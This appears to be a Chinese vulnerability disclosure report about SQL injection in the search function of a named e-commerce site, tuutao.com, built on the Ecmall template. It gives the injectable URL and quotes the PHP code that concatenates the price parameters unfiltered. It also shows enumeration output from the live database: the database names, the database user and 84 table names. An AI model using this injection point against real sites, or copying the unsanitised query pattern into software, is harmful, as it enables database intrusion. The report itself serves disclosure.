### 简要描述:
SQL注射
### 详细说明:
http://www.tuutao.com/index.php 土淘网
用的Ecmall的建站模板,用过这个模板的应该都通杀了吧
[<img src="https://images.seebug.org/upload/201401/05154854944082e59c2c01112613d85009ccb2b2.jpg" alt="s1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/05154854944082e59c2c01112613d85009ccb2b2.jpg)
存在搜索框注入,注入点为:
http://www.tuutao.com/index.php?app=store&act=search&id=45&keyword=aaa&min_price=100&max_price=10000
首先将获取get传来的参数,然后组合到一个sql查询语句condition中:
1.search.app.php中的这段代码就是构建查询min和max价格的sql代码,没有过滤:
```
/**
* 取得查询条件语句
*
* @param array $param 查询参数(参加函数_get_query_param的返回值说明)
* @return string where语句
*/
function _get_goods_conditions($param)
{
/* 组成查询条件 */
$conditions = " g.if_show = 1 AND g.closed = 0 AND s.state = 1"; // 上架且没有被禁售,店铺是开启状态,
if (isset($param['keyword']))
{
$conditions .= $this->_get_conditions_by_keyword($param['keyword'], ENABLE_SEARCH_CACHE);
}
if (isset($param['cate_id']))
{
$conditions .= " AND g.cate_id_{$param['layer']} = '" . $param['cate_id'] . "'";
}
if (isset($param['brand']))
{
$conditions .= " AND g.brand = '" . $param['brand'] . "'";
}
if (isset($param['region_id']))
{
$conditions .= " AND s.region_id = '" . $param['region_id'] . "'";
}
if (isset($param['price']))
{
$min = $param['price']['min'];
$max = $param['price']['max'];
$min > 0 && $conditions .= " AND g.price >= '$min'";
$max > 0 && $conditions .= " AND g.price <= '$max'";
}
return $conditions;
}
```
2.下面这部分代码是query执行部分,直接将上面的参数带入查询了:
```
/* 按价格统计 */
if ($total_count > NUM_PER_PAGE)
{
$sql = "SELECT MIN(g.price) AS min, MAX(g.price) AS max FROM {$table} WHERE" . $conditions;
$row = $goods_mod->getRow($sql);
$min = $row['min'];
$max = min($row['max'], MAX_STAT_PRICE);
$step = max(ceil(($max - $min) / PRICE_INTERVAL_NUM), MIN_STAT_STEP);
$sql = "SELECT FLOOR((g.price - '$min') / '$step') AS i, count(*) AS count FROM {$table} WHERE " . $conditions . " GROUP BY i ORDER BY i";
$res = $goods_mod->db->query($sql);
while ($row = $goods_mod->db->fetchRow($res))
{
$data['by_price'][] = array(
'count' => $row['count'],
'min' => $min + $row['i'] * $step,
'max' => $min + ($row['i'] + 1) * $step,
);
}
}
}
```
3.这个页面上很多参数都没过滤,排查下吧
### 漏洞证明:
数据库:
```
available databases [2]:
[*] information_schema
[*] tuutao
```
账户:
```
current user: 'tuutao_u@localhost'
```
数据库tuutao包含的表:
```
Database: tuutao
[84 tables]
+------------------------+
| _ecm_third_login |
| chat_customgroup |
| chat_pals |
| chat_session |
| chat_transfer_fileinfo |
| chat_users |
| ecm_acategory |
| ecm_address |
| ecm_ads_left |
| ecm_article |
| ecm_ative |
| ecm_attribute |
| ecm_brand |
| ecm_cart |
| ecm_category_goods |
| ecm_category_store |
| ecm_collect |
| ecm_coupon |
| ecm_coupon_sn |
| ecm_friend |
| ecm_function |
| ecm_game |
| ecm_gcategory |
| ecm_get_prize |
| ecm_goods |
| ecm_goods_attr |
| ecm_goods_image |
| ecm_goods_integral |
| ecm_goods_qa |
| ecm_goods_spec |
| ecm_goods_statistics |
| ecm_goods_tpl |
| ecm_goods_tuijian |
| ecm_groupbuy |
| ecm_groupbuy_log |
| ecm_handsel |
| ecm_hdlog |
| ecm_integral |
| ecm_logistics |
| ecm_logistics_conf |
| ecm_logsingle |
| ecm_mail_queue |
| ecm_member |
| ecm_member_ofields |
| ecm_message |
| ecm_module |
| ecm_money_logs |
| ecm_navigation |
| ecm_order |
| ecm_order_extm |
| ecm_order_goods |
| ecm_order_integral |
| ecm_order_log |
| ecm_pageview |
| ecm_partner |
| ecm_payment |
| ecm_privilege |
| ecm_prize |
| ecm_promotion |
| ecm_promotion_local |
| ecm_promotion_log |
| ecm_recommend |
| ecm_recommended_goods |
| ecm_refer |
| ecm_region |
| ecm_scategory |
| ecm_seckill |
| ecm_seckill_subject |
| ecm_sessions |
| ecm_sessions_data |
| ecm_sgrade |
| ecm_ship |
| ecm_shipping |
| ecm_specialpage |
| ecm_specialpage_goods |
| ecm_specify |
| ecm_store |
| ecm_template |
| ecm_third_login |
| ecm_timedisc |
| ecm_uploaded_file |
| ecm_user_coupon |
| ecm_user_priv |
| ecm_user_prize |
+------------------------+
```
京公网安备 11010502034610号
暂无评论